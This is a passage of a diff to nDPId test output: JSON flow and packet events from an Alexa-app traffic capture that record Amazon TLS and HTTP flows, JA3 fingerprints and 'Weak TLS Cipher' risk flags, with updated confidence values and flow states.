Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 
{"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2576,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976169531,"flow_last_seen":1490976169531,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976169531,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2576,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1490976169531,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976169531,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8anRAAEAG3HqsECrYNF7ohrK4AbvvmuryAAAAAKAC\/\/9DtAAAAgQFtAQCCAoA9oCGAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2577,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":1490976169726,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976169726,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwhFlAAOcGG6E0XuiGrBAq2AG7srhwEXla75rq83ASH\/73zwAAAgQFtAEDAwY="} 
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2578,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":3,"flow_last_seen":1490976169729,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976169729,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoanVAAEAG3I2sECrYNF7ohrK4AbvvmurzcBF5W1AQAVdCQQAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2579,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976169531,"flow_last_seen":1490976169731,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976169731,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2580,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976169531,"flow_last_seen":1490976169888,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976169888,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1490976044439,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":2175,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976041156,"flow_last_seen":1490976043655,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10376,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976041384,"flow_last_seen":1490976042405,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1098,"flow_tot_l4_payload_len":2371,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976041400,"flow_last_seen":1490976042398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1130,"flow_tot_l4_payload_len":2403,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1490976044189,"flow_last_seen":1490976046415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1178,"flow_tot_l4_payload_len":6385,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1490976044219,"flow_last_seen":1490976046417,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1194,"flow_tot_l4_payload_len":6417,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976044488,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1146,"flow_tot_l4_payload_len":4402,"flow_avg_l4_payload_len":200,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1490976044502,"flow_last_seen":1490976046415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1130,"flow_tot_l4_payload_len":2403,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1490976044509,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1490976044521,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1490976046418,"flow_last_seen":1490976048924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1194,"flow_tot_l4_payload_len":9785,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1490976047096,"flow_last_seen":1490976048927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1490976041942,"flow_last_seen":1490976046399,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41433,"flow_avg_l4_payload_len":531,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976041961,"flow_last_seen":1490976042341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5681,"flow_avg_l4_payload_len":334,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2579,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976169531,"flow_last_seen":1490976169731,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976169731,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2580,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976169531,"flow_last_seen":1490976169888,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976169888,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
+00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1490976044439,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":2175,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976041156,"flow_last_seen":1490976043655,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10376,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1490976041384,"flow_last_seen":1490976042405,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1098,"flow_tot_l4_payload_len":2371,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1490976041400,"flow_last_seen":1490976042398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1130,"flow_tot_l4_payload_len":2403,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976044189,"flow_last_seen":1490976046415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1178,"flow_tot_l4_payload_len":6385,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976044219,"flow_last_seen":1490976046417,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1194,"flow_tot_l4_payload_len":6417,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1490976044488,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1146,"flow_tot_l4_payload_len":4402,"flow_avg_l4_payload_len":200,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976044502,"flow_last_seen":1490976046415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1130,"flow_tot_l4_payload_len":2403,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00807{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1490976044509,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00807{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1490976044521,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976046418,"flow_last_seen":1490976048924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1194,"flow_tot_l4_payload_len":9785,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00807{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1490976047096,"flow_last_seen":1490976048927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1490976041942,"flow_last_seen":1490976046399,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41433,"flow_avg_l4_payload_len":531,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976041961,"flow_last_seen":1490976042341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5681,"flow_avg_l4_payload_len":334,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976042054,"flow_last_seen":1490976042398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976042054,"flow_last_seen":1490976042398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 